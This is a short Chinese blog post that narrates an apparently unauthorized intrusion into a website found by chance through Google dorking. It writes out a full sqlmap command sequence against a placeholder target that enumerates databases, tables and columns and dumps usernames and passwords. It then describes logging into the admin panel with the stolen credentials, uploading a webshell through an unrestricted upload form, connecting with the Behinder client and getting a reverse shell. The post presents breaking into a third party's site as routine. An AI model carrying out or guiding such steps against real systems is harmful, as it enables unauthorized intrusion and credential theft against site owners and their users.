前言

最近在使用Google Hack搜索网站时偶然发现一个存在sql注入的网站,经过进一步的渗透和挖掘发现后台地址及账号密码,并最终获取shell

找到目标站点:


通过简单的加单引号判断有报错

所以直接丢到sqlmap里跑一下

果不其然存在sql注入漏洞
sqlmap

接下来就是常规操作

  • 获取数据库名:
    python sqlmap.py -u http://xxx.com/index.php?id=23 --dbs
  • 查询数据库用户角色:
    python sqlmap.py -u http://xxx.com/index.php?id=23 --roles

    可惜了权限很低
  • 爆表
    python sqlmap.py -u http://xxx.com/index.php?id=23 -D xx --tables
  • 爆字段
    python sqlmap.py -u http://xxx.com/index.php?id=23 -D xx -T xx_users --columns
  • 爆数据
    python sqlmap.py -u http://xxx.com/index.php?id=23 -D xx -T xx_users -C username,password --dump

    获得所有用户名和密码

寻找后台及getshell

刚开始用dirsearch跑了一下后台没结果,后来查看了一下robots.txt,发现了后台目录,


使用刚刚获取到的账号密码成功登录后台

后台有个地方可以直接上传文件,没有限制,直接上传马子能成功

  • 用冰蝎连接

    连接成功
  • 权限很低,而且没有安装gcc无法编译exp提权。
  • 反弹shell成功:
最后修改:2021 年 03 月 30 日
如果觉得我的文章对你有用,请随意赞赏